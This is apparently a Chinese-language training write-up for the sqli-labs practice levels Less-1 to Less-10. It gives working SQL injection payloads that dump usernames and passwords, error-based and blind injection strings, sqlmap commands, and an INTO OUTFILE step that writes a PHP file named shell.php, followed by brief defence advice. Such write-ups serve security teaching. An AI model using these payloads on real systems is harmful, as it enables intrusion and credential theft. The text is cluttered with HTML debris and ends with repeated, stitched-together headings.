SQL注入攻击技术详解：sqli-labs靶场Less-1至Less-10实战指南<\/h1>

1. SQL注入基础概念<\/h2>
SQL注入是一种通过在用户输入中插入恶意SQL代码来操纵数据库查询的攻击技术。攻击者可以利用这种技术绕过认证、窃取数据、修改数据甚至获取服务器控制权。<\/p>

2. 注入类型判断方法<\/h2>

2.1 数字型与字符型注入的区分<\/h3>

减法判断法<\/strong>：<\/p>

id=2-1<\/code>：如果返回id=1的结果，则是数字型注入；否则是字符型注入<\/li>
原理：数字型会计算表达式，字符型会将整个表达式视为字符串<\/li> <\/ul> <\/li>
逻辑判断法<\/strong>：<\/p> id=1 and 1=1<\/code> 和 id=1 and 1=2<\/code>：两者都能正常回显 → 字符型注入<\/li> 只有前者正常回显 → 数字型注入<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 2.2 字符型注入闭合方式判断<\/h3> 常见闭合方式：'<\/code>、"<\/code>、')<\/code>、")<\/code>等<\/p> 判断方法：<\/p> 尝试id=1'<\/code>和id=1"<\/code>：如果id=1'<\/code>报错 → 可能是'<\/code>闭合<\/li> 如果id=1"<\/code>报错 → 可能是"<\/code>闭合<\/li> 如果两者都报错 → 可能是混合闭合（如')<\/code>、")<\/code>）<\/li> <\/ul> <\/li> <\/ul> 3. 各关卡详细注入技术<\/h2> Less-1：字符型单引号注入<\/h3> 源码分析<\/strong>：<\/p> $id=<\/span>$_GET['id'<\/span>]; <\/span><\/span>$sql=<\/span>"SELECT * FROM users WHERE id='<\/span>$id<\/span>' LIMIT 0,1"<\/span>; <\/span><\/span><\/code><\/pre>注入步骤<\/strong>：<\/p> 判断列数： ?<\/span>id=<\/span>1<\/span>' order by 3--+ <\/span><\/span><\/span><\/code><\/pre><\/li> 联合查询： ?<\/span>id=-<\/span>1<\/span>' union select 1,2,3--+ <\/span><\/span><\/span><\/code><\/pre><\/li> 获取数据库信息： ?<\/span>id=-<\/span>1<\/span>' union select 1,2,database()--+ <\/span><\/span><\/span><\/code><\/pre><\/li> 获取表名： ?<\/span>id=-<\/span>1<\/span>' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+ <\/span><\/span><\/span><\/code><\/pre><\/li> 获取列名： ?<\/span>id=-<\/span>1<\/span>' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='<\/span>users')--+ <\/span><\/span><\/span><\/code><\/pre><\/li> 获取数据： ?<\/span>id=-<\/span>1<\/span>' union select 1,2,group_concat(username,'<\/span>:',password) from users--+ <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ol> Less-2：数字型注入<\/h3> 源码分析<\/strong>：<\/p> $id=<\/span>$_GET['id'<\/span>]; <\/span><\/span>$sql=<\/span>"SELECT * FROM users WHERE id=<\/span>$id<\/span> LIMIT 0,1"<\/span>; <\/span><\/span><\/code><\/pre>注入步骤<\/strong>：与Less-1类似，但无需闭合单引号：<\/p> ?<\/span>id=-<\/span>1<\/span> union<\/span> select<\/span> 1<\/span>,2<\/span>,group_concat(username,':'<\/span>,password) from<\/span> users <\/span><\/span><\/code><\/pre>Less-3：字符型单引号括号注入<\/h3> 源码分析<\/strong>：<\/p> $sql=<\/span>"SELECT * FROM users WHERE id=('<\/span>$id<\/span>') LIMIT 0,1"<\/span>; <\/span><\/span><\/code><\/pre>注入步骤<\/strong>：使用')<\/code>闭合：<\/p> ?<\/span>id=-<\/span>1<\/span>') union select 1,2,group_concat(username,'<\/span>:',password) from users --+ <\/span><\/span><\/span><\/code><\/pre>Less-4：字符型双引号括号注入<\/h3> 源码分析<\/strong>：<\/p> $id =<\/span> '"'<\/span>.<\/span>$id.<\/span>'"'<\/span>; <\/span><\/span>$sql=<\/span>"SELECT * FROM users WHERE id=<\/span>$id<\/span> LIMIT 0,1"<\/span>; <\/span><\/span><\/code><\/pre>注入步骤<\/strong>：使用")<\/code>闭合：<\/p> ?<\/span>id=-<\/span>1<\/span>") union select 1,2,group_concat(username,':',password) from users --+ <\/span><\/span><\/span><\/code><\/pre>Less-5：单引号报错注入<\/h3> 源码特点<\/strong>：<\/p> 查询成功只显示"You are in"，不显示数据<\/li> 查询失败会显示错误信息<\/li> <\/ul> 报错注入函数<\/strong>：<\/p> updatexml()<\/code><\/li> extractvalue()<\/code><\/li> floor() + rand() + group by<\/code><\/li> exp()<\/code><\/li> <\/ol> 注入步骤<\/strong>：<\/p> ?<\/span>id=<\/span>1<\/span>' and updatexml(1,concat(0x7e,version()),3) --+ <\/span><\/span><\/span><\/code><\/pre> 0x7e<\/code>是~<\/code>的十六进制表示<\/li> 第一个和第三个参数可随意，用于触发XPath语法错误<\/li> <\/ul> 完整利用<\/strong>：<\/p> 获取数据库名： ?<\/span>id=<\/span>1<\/span>' and updatexml(1,concat(0x7e,database()),3) --+ <\/span><\/span><\/span><\/code><\/pre><\/li> 获取表名： ?<\/span>id=<\/span>1<\/span>' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3)--+ <\/span><\/span><\/span><\/code><\/pre><\/li> 获取数据（需使用limit限制返回行数）： ?<\/span>id=<\/span>1<\/span>' and updatexml(1,concat(0x7e,(select concat(username,'<\/span>:',password) from users limit 0,1)),3)--+ <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ol> Less-6：双引号报错注入<\/h3> 与Less-5类似，但闭合方式为双引号：<\/p> ?<\/span>id=<\/span>1<\/span>" and updatexml(1,concat(0x7e,database()),3) --+ <\/span><\/span><\/span><\/code><\/pre>Less-7：文件读写注入<\/h3> 注入特点<\/strong>：<\/p> 闭合方式为'))<\/code><\/li> 可利用INTO OUTFILE<\/code>写入文件<\/li> <\/ul> 前置条件<\/strong>：<\/p> 获取MySQL写入目录： ?<\/span>id=-<\/span>1<\/span>' UNION SELECT 1,@@basedir,@@datadir --+ <\/span><\/span><\/span><\/code><\/pre><\/li> 确保secure_file_priv<\/code>参数为空： secure_file_priv<\/span> =<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 文件写入步骤<\/strong>：<\/p> 写入数据库信息： ?<\/span>id=-<\/span>1<\/span>')) union select 1,2,database() into outfile "D:\\path\\test.txt" --+ <\/span><\/span><\/span><\/code><\/pre><\/li> 写入一句话木马： ?<\/span>id=-<\/span>1<\/span>')) union select 1,2,"<?php phpinfo();?>" into outfile "D:\\path\\shell.php" --+ <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ol> Less-8：布尔盲注<\/h3> 适用场景<\/strong>：<\/p> 页面没有明显错误回显<\/li> 只有"正确"和"错误"两种状态<\/li> <\/ul> 关键函数<\/strong>：<\/p> ascii(str)<\/code> - 返回ASCII码<\/li> length(str)<\/code> - 返回字符串长度<\/li> mid(str,index,j)<\/code> - 返回从index开始的j个字符<\/li> substr(str,index,j)<\/code> - 同mid<\/li> <\/ol> 注入步骤<\/strong>：<\/p> 判断数据库长度： ?<\/span>id=<\/span>1<\/span>' and length(database())=8 --+ <\/span><\/span><\/span><\/code><\/pre><\/li> 逐字符判断： ?<\/span>id=<\/span>1<\/span>' and ascii(mid(database(),1,1))=115 --+ <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ol> 自动化工具<\/strong>：<\/p> sqlmap -u http:\/\/target\/Less-8\/?id=<\/span>1<\/span> --batch <\/span><\/span><\/code><\/pre>Less-9：时间盲注<\/h3> 适用场景<\/strong>：<\/p> 页面无论输入什么总是相同回显<\/li> <\/ul> 关键函数<\/strong>：<\/p> if<\/span>(条件<\/span>,a,b) #<\/span> 条件为真返回<\/span>a，否则返回<\/span>b <\/span><\/span>sleep(n) #<\/span> 延迟<\/span>n秒<\/span> <\/span><\/span><\/code><\/pre>注入步骤<\/strong>：<\/p> 判断闭合方式： ?<\/span>id=<\/span>1<\/span>' and if(1,sleep(5),1) --+ <\/span><\/span><\/span><\/code><\/pre><\/li> 判断数据库长度： ?<\/span>id=<\/span>1<\/span>' and if(length(database())=8,sleep(5),1)--+ <\/span><\/span><\/span><\/code><\/pre><\/li> 逐字符判断： ?<\/span>id=<\/span>1<\/span>' and if(ascii(mid(database(),1,1))=115,sleep(5),1)--+ <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ol> 自动化工具<\/strong>：<\/p> sqlmap -u http:\/\/target\/Less-9\/?id=<\/span>1<\/span> --batch --technique T <\/span><\/span><\/code><\/pre>Less-10：双引号时间盲注<\/h3> 与Less-9类似，但闭合方式为双引号：<\/p> ?<\/span>id=<\/span>1<\/span>" and if(1,sleep(5),1) --+ <\/span><\/span><\/span><\/code><\/pre>自动化工具<\/strong>：需要指定level参数：<\/p> sqlmap -u http:\/\/target\/Less-10\/?id=<\/span>1<\/span> --batch --level 3<\/span> <\/span><\/span><\/code><\/pre>4. 防御建议<\/h2> 使用参数化查询（预处理语句）<\/li> 对用户输入进行严格过滤和转义<\/li> 最小权限原则，数据库用户只赋予必要权限<\/li> 关闭错误回显<\/li> 使用Web应用防火墙(WAF)<\/li> <\/ol> 5. 总结<\/h2> 本教程详细介绍了sqli-labs前10关的各种SQL注入技术，包括：<\/p> 联合查询注入<\/li> 报错注入<\/li> 布尔盲注<\/li> 时间盲注<\/li> 文件读写注入<\/li> <\/ul> 每种技术都有其适用场景和利用方法，理解这些技术原理对于Web安全测试和防御至关重要。<\/p>

SQL注入攻击技术详解：sqli-labs靶场Less-1至Less-10实战指南<\/h1>

1. SQL注入基础概念<\/h2> SQL注入是一种通过在用户输入中插入恶意SQL代码来操纵数据库查询的攻击技术。攻击者可以利用这种技术绕过认证、窃取数据、修改数据甚至获取服务器控制权。<\/p>

2. 注入类型判断方法<\/h2>

3. 各关卡详细注入技术<\/h2>

1. SQL注入基础概念<\/h2>
SQL注入是一种通过在用户输入中插入恶意SQL代码来操纵数据库查询的攻击技术。攻击者可以利用这种技术绕过认证、窃取数据、修改数据甚至获取服务器控制权。<\/p>